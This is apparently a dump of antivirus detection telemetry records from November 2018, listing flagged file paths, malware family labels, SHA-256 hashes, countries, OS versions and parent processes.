  Row(detection=Row(filename='avscan-20181105-055330-3b30f437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055330-3B30F437', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tylO5IJZbUyVvd6n.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T07:42:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxpayne.exe', filepath='E:\\العاب\\العاب الوكيل\\4x4\\4\\New Briefcase\\Max Payne\\MaxPayne.exe', filesize=5120000, name='W32/Sality.AT.#M1.#R1'), hash='45919ef2bbec79687f66a6827276be60fdd4fb2cf45eb913f23209cfb256f9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:09:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B8B0C4CED6F4940AD618504357EE6F92FC54251C20D762162F50B9A683781759', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b8b0c4ced6f4940ad618504357ee6f92fc54251c20d762162f50b9a683781759', metadata=Row(cmdline='-r', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:51:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T07:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:06:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210041-5ddae1d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210041-5DDAE1D5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='b2efba529f2576d321699273a52e4dc2b79e5295b7dbe698a77a56e27369aabc', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:35:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213413-3772b113', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8de63534\\AVSCAN-20181104-213141-21155475\\AVSCAN-20181104-213413-3772B113', filesize=28000, name='Adware/Genieo.yejuo.#M1.#R1'), hash='dc7d049bb389ad688977b4b739a8d1efe7c61d36715d9492c77fab0b8ecadeec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:33:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T11:31:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whclzyof.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WHcLZyOf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tseafpzm.exe', filepath='C:\\Windows\\SysWOW64\\tvufazor\\tseafpzm.exe', filesize=13248000, name='TR/Crypt.XPACK.Gen8.#M1.#R1'), hash='a2ba695233e533e0c2f7995bf24e789c31c00cee1f3676d1bc3aa17b70b2a6b2', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=44520, timestamp='2018-11-02T12:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gltaqcdl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\gLTaqcdl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\e:\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153748-5fc372b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_37cc023a\\AVSCAN-20181102-153728-5C004440\\AVSCAN-20181102-153748-5FC372B1', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='usbwriteprotector.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\USBWriteProtector.exe", filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105652-7381deb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105652-7381DEB5', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='C:\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='c58874f818da4d0df60a86d6cac3d3b2b1d5230a5b6495a3f7c6a76c25a2361c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Tencent\\QQBrowser\\QQBrowser.exe', parentsize=1315136, timestamp='2018-11-02T08:24:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='cb507beaed240120c70b8c22735470942cca04c81eb508b6ba86e0c786ea180a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b7bc41d3db63b7a0294d2972e9105d5195c9608751ca67630c08d4b78d580e9f.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B7BC41D3DB63B7A0294D2972E9105D5195C9608751CA67630C08D4B78D580E9F.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b7bc41d3db63b7a0294d2972e9105d5195c9608751ca67630c08d4b78d580e9f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:52:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9CB3C525708BF734CEBFF469B26C95C8C641311A1701BB9535645632D3CC6620', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utilman.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\utilman.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='bf4ebfc2b7418095fa9eb5e11cfc20ce39a05c8ba201d79507c8af9540f23102', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rad401ad.tmp.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\low\\rad401ad.tmp.exe', filesize=192000, name='TR/AD.Bulta.Y.#M1.#R1'), hash='e3786ecd97f36eb1160b9eb50df42a58590d307c4b5e962bc7711bab4f8e7882', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\cmd.exe', parentsize=301568, timestamp='2018-11-02T12:10:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T13:12:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094823-c8ae943e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea2556e3\\AVSCAN-20181102-092056-4C43C110\\AVSCAN-20181102-094823-C8AE943E', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101919-9919cf58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101919-9919CF58', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-044109-ee4509fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-044109-EE4509FA', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='9922e46dae1b6432d9a5474a0631efb2103e210e0d569796c00293a93328bfb0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:43:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163031-66c5801c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-162755-510CDF80\\AVSCAN-20181102-163031-66C5801C', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winrar-x64-400tc.exe', filepath='H:\\新增資料夾 (3)\\@250 訓導處\\1  訓導主任\\WinRAR 4.00 Final\\winrar-x64-400tc.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='dbdeeba49a35d8db2b47f55e6cbb921d8128ee523a8d94e4340194656eb40ce6', metadata=Row(cmdline='-m \\\\\\"nas-hdd\\\\\\"', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\2BrightSparks\\SyncBackFree\\SyncBackFree.exe', parentsize=27638328, timestamp='2018-11-02T14:04:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletedoctor.exe', filepath='E:\\HBCD\\Programs\\DeleteDoctor.exe', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232633-e5d227e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_895e5944\\AVSCAN-20181102-231658-9FA99280\\AVSCAN-20181102-232633-E5D227E9', filesize=4040000, name='PUA/Systweak.#M1.#R1'), hash='fa280a54d6e939059b025c92eb2bccb3db8ab2265a1c2883b24c68fdfb34a5f1', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103521-e4822ffa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_02535218\\AVSCAN-20181102-103404-DDDB95B1\\AVSCAN-20181102-103521-E4822FFA', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='[0]-audit casual upload.exe', filepath='D:\\AUDIT4\\[0]-Audit Casual Upload.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='faf55154b6f314050cf4568b1218ec0a0b4887455d120e84b54f601ccfe7f1bb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Program Files (x86)\\mitmproxy\\bin\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='a4be9cda3ed50d523ea2c6a6df0917c28bb4dc6b72b19028eb6e65d391fc796f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\mitmproxy-4.0.3-windows-installer.exe', parentsize=40949504, timestamp='2018-11-02T09:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101158-52157bb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-101008-436B261D\\AVSCAN-20181102-101158-52157BB7', filesize=1856000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='a0d9ae35f724d70176fa6cf496c8a9f270dc39c3b9d0fa4fd003fce249cdfcfe', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150032-4fbdb84d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96e7b237\\AVSCAN-20181102-135942-EE74710F\\AVSCAN-20181102-150032-4FBDB84D', filesize=3968000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='8e4e5cd8ae0fe52300ef4db07b262452e9d6314aeeba403aa343ba362f519cdf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mxf_sdk_genericcontainer_mpeg_mpeg2video_4.4.3.dll', filepath='c:\\program files (x86)\\common files\\adobe\\dynamiclinkmediaserver\\1.0\\MXF_SDK_GenericContainer_MPEG_MPEG2Video_4.4.3.dll', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='f094c69e1a5c8e5c811f6a88925726f4d808a86c988c9def1f24dfee4a983fcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:14:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='914a0371021dfd8e3ccb7fc71597ea4edf69cbc68019c2d9b903bd7f6785355a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\914A0371021DFD8E3CCB7FC71597EA4EDF69CBC68019C2D9B903BD7F6785355A', filesize=576000, name='W32/Neshta.A.#M1.#R1'), hash='914a0371021dfd8e3ccb7fc71597ea4edf69cbc68019c2d9b903bd7f6785355a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-152340-97b1f36b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-152340-97B1F36B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294049', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294049', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:34:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d21b4ada04f3e213027ab730c6969d1dacaf0cbf', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\d21b4ada04f3e213027ab730c6969d1dacaf0cbf', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239cb6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239cb6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029184b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029184b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:54:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl17c.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl17C.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c4764c8e6ae4e4314739df37720893e477a78d604f7dc20669f31faddc6e3542', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C4764C8E6AE4E4314739DF37720893E477A78D604F7DC20669F31FADDC6E3542', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c4764c8e6ae4e4314739df37720893e477a78d604f7dc20669f31faddc6e3542', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:08:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1a6.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1A6.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002396b6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002396b6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135131-30bb3ce8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b2055eb\\AVSCAN-20181104-134144-E9320359\\AVSCAN-20181104-135131-30BB3CE8', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:35Z'), dt=datetime.date(2018, 11, 4)),
